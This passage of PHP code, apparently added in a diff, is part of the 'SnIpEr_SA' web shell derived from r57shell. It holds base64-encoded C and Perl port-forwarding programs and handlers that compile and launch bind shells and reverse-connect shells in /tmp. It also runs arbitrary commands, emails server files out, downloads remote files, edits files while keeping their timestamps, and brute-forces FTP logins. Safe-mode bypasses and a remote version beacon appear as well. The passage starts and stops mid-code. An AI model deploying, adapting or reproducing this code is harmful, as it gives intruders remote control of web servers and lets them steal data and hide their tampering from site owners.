+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."ÇáæÖÚ ÇáÇãä: <b>";
+echo (($safe_mode)?("<font color=#008000>ÝÚÇá</font>"):("<font color=red>ÛíÑ ÝÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "ÇáßíÑá: <b>".(($curl_on)?("<font color=#008000>ÝÚÇá</font>"):("<font color=red>ÛíÑ ÝÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ãÇí Óßá: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>ÝÚÇá</font>"; } else { echo "<font color=red>ÛíÑ ÝÚÇá</font>"; }
+echo "</b>".ws(2);
+echo "Çã ÇÓ Óßá: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ÛíÑ ÝÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÈæÓÊ ÞÑí Óßá: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ÛíÑ ÝÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÇæÑÇßá: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>ÝÚÇá</font>";}else{echo "<font color=red>ãÛáÞ</font>";}
+echo "</b><br>".ws(2);
+echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>áÇíæÌÏ</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : <b>".view_size($free)."</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+  {
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else
+   {
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
